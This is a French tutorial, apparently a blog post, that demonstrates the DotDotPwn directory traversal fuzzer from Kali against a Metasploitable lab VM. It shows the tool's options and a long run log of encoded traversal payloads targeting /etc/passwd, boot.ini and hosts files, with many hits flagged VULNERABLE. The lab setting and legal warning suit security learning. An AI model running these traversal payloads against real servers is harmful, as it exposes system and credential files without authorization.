Rappel :

Attention dans cet article l'outils est utilisé pour la recherche et l'apprentissage. Ce type d'outils ne doit pas être utilisé vers un serveur qui ne vous appartient pas, ceci peut être puni par la loi (voir les articles 323-XX).

Environnement de test :

Pour cela nous allons utiliser une VM tournant sur la distribution Kali et une VM Metasploitable Server (cible) qui est un serveur ayant des vulnérabilités pour faire des démos.

Voici un schéma :
schema

DotDotPwn

Kali embarque par défaut DotDotpwn. Les modules de fuzzing supportés sont :

  • HTTP
  • HTTP URL
  • FTP
  • TFTP
  • Payload
  • STDOUT

Utilisation

Options

 1 root@kali:~# dotdotpwn.pl
 2 #################################################################################
 3 #                                                                               #
 4 #  CubilFelino                                                       Chatsubo   #
 5 #  Security Research Lab              and            [(in)Security Dark] Labs   #
 6 #  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
 7 #                                                                               #
 8 #                               pr0udly present:                                #
 9 #                                                                               #
10 #  ________            __  ________            __  __________                   #
11 #  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
12 #   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
13 #   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
14 #  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
15 #          \/                      \/                                      \/   #
16 #                               - DotDotPwn v3.0 -                              #
17 #                         The Directory Traversal Fuzzer                        #
18 #                         http://dotdotpwn.sectester.net                        #
19 #                            dotdotpwn@sectester.net                            #
20 #                                                                               #
21 #                               by chr1x & nitr0us                              #
22 #################################################################################
23 
24 Usage: ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
25  Available options:
26  -m    Module [http | http-url | ftp | tftp | payload | stdout]
27  -h    Hostname
28  -O    Operating System detection for intelligent fuzzing (nmap)
29  -o    Operating System type if known ("windows", "unix" or "generic")
30  -s    Service version detection (banner grabber)
31  -d    Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
32  -f    Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
33  -E    Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
34  -S    Use SSL - for HTTP and Payload module (use https:// for in url for http-uri)
35  -u    URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
36  -k    Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
37  -p   Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
38  -x    Port to connect (default: HTTP=80; FTP=21; TFTP=69)
39  -t    Time in milliseconds between each test (default: 300 (.3 second))
40  -X    Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
41  -e    File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
42  -U    Username (default: 'anonymous')
43  -P    Password (default: 'dot@dot.pwn')
44  -M    HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
45  -r    Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
46  -b    Break after the first vulnerability is found
47  -q    Quiet mode (doesn't print each attempt)
48  -C    Continue if no data was received from host

Exemple du module HTTP

Lancement du script sur notre serveur metasploitable en HTTP.

  1 root@kali:~# dotdotpwn.pl -m http -h 192.168.5.11 -M GET
  2 #################################################################################
  3 #                                                                               #
  4 #  CubilFelino                                                       Chatsubo   #
  5 #  Security Research Lab              and            [(in)Security Dark] Labs   #
  6 #  chr1x.sectester.net                             chatsubo-labs.blogspot.com   #
  7 #                                                                               #
  8 #                               pr0udly present:                                #
  9 #                                                                               #
 10 #  ________            __  ________            __  __________                   #
 11 #  \______ \    ____ _/  |_\______ \    ____ _/  |_\______   \__  _  __ ____    #
 12 #   |    |  \  /  _ \\   __\|    |  \  /  _ \\   __\|     ___/\ \/ \/ //    \   #
 13 #   |    `   \(  <_> )|  |  |    `   \(  <_> )|  |  |    |     \     /|   |  \  #
 14 #  /_______  / \____/ |__| /_______  / \____/ |__|  |____|      \/\_/ |___|  /  #
 15 #          \/                      \/                                      \/   #
 16 #                               - DotDotPwn v3.0 -                              #
 17 #                         The Directory Traversal Fuzzer                        #
 18 #                         http://dotdotpwn.sectester.net                        #
 19 #                            dotdotpwn@sectester.net                            #
 20 #                                                                               #
 21 #                               by chr1x & nitr0us                              #
 22 #################################################################################
 23 
 24 [+] Report name: Reports/192.168.5.11_03-27-2016_21-23.txt
 25 
 26 [========== TARGET INFORMATION ==========]
 27 [+] Hostname: 192.168.5.11
 28 [+] Protocol: http
 29 [+] Port: 80
 30 
 31 [=========== TRAVERSAL ENGINE ===========]
 32 [+] Creating Traversal patterns (mix of dots and slashes)
 33 [+] Multiplying 6 times the traversal patterns (-d switch)
 34 [+] Creating the Special Traversal patterns
 35 [+] Translating (back)slashes in the filenames
 36 [+] Adapting the filenames according to the OS type detected (generic)
 37 [+] Including Special sufixes
 38 [+] Traversal Engine DONE ! - Total traversal tests created: 19680
 39 
 40 [=========== TESTING RESULTS ============]
 41 [+] Ready to launch 3.33 traversals per second
 42 [+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
 43 
 44 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../etc/passwd
 45 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../etc/issue
 46 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../boot.ini
 47 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../windows/system32/drivers/etc/hosts
 48 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../etc/passwd
 49 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../etc/issue
 50 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../boot.ini
 51 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../windows/system32/drivers/etc/hosts
 52 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../etc/passwd
 53 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../etc/issue
 54 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../boot.ini
 55 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../windows/system32/drivers/etc/hosts
 56 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../etc/passwd
 57 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../etc/issue
 58 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../boot.ini
 59 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../windows/system32/drivers/etc/hosts
 60 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../etc/passwd
 61 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../etc/issue
 62 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../boot.ini
 63 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../windows/system32/drivers/etc/hosts
 64 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../etc/passwd
 65 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../etc/issue
 66 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../boot.ini
 67 [*] HTTP Status: 400 | Testing Path: http://192.168.5.11:80/../../../../../../windows/system32/drivers/etc/hosts
 68 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cetc%5Cpasswd
 69 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cetc%5Cissue
 70 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cboot.ini
 71 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
 72 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cetc%5Cpasswd
 73 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cetc%5Cissue
 74 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cboot.ini
 75 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
 76 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cetc%5Cpasswd
 77 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cetc%5Cissue
 78 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cboot.ini
 79 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
 80 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cetc%5Cpasswd
 81 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cetc%5Cissue
 82 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cboot.ini
 83 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
 84 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
 85 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cetc%5Cissue
 86 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cboot.ini
 87 [*] HTTP Status: 404 | Testing Path: http://192.168.5.11:80/..%5C..%5C..%5C..%5C..%5Cwindows%5Csystem32%5Cdrivers%5Cetc%5Chosts
 88 --SNiP--
 89 [*] Testing Path: http://192.168.5.11:80/.?%252fetc%252fpasswd <- VULNERABLE!
 90 
 91 [*] Testing Path: http://192.168.5.11:80/.?%252fetc%252fissue <- VULNERABLE!
 92 
 93 [*] Testing Path: http://192.168.5.11:80/.?%252fboot.ini <- VULNERABLE!
 94 
 95 [*] Testing Path: http://192.168.5.11:80/.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!
 96 
 97 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fetc%252fpasswd <- VULNERABLE!
 98 
 99 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fetc%252fissue <- VULNERABLE!
100 
101 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fboot.ini <- VULNERABLE!
102 
103 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!
104 
105 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fetc%252fpasswd <- VULNERABLE!
106 
107 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fetc%252fissue <- VULNERABLE!
108 
109 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fboot.ini <- VULNERABLE!
110 
111 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!
112 
113 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fetc%252fpasswd <- VULNERABLE!
114 
115 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fetc%252fissue <- VULNERABLE!
116 
117 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fboot.ini <- VULNERABLE!
118 
119 [*] Testing Path: http://192.168.5.11:80/.?%252f.?%252f.?%252f.?%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts <- VULNERABLE!
120 ^C
121 [+] Total Traversals found: 160
122 [-] Fuzz testing aborted
123 [+] Report saved: Reports/192.168.5.11_03-27-2016_21-23.txt

Nous voyions que le script fait du fuzzing sur les mêmes patterns en essayant différent encodages.
Du fait que nous n'avons pas spécifié l'OS (option -o unix pour notre cas) il teste les patterns, windows, unix, ...
J'émets juste une réserve sur les retours avec VULNERABLE, c'est juste le fait que le serveur lui renvoie un status code HTTP 200, cela dépends de la configuration du serveur Web.

Bonus :

Dans le fichier /usr/share/dotdotpwn/DotDotPwn/TraversalEngine.pm vous trouverez les fichiers rechercher par le fuzzing (il est donc possible d'en ajouter) et l'encodage des slashs et point.
Dans le dossier, il y a le code des différents modules.

Media présentation à la BlackHat par nitrØus et chr1x

Explications par l'exemple par wireghoul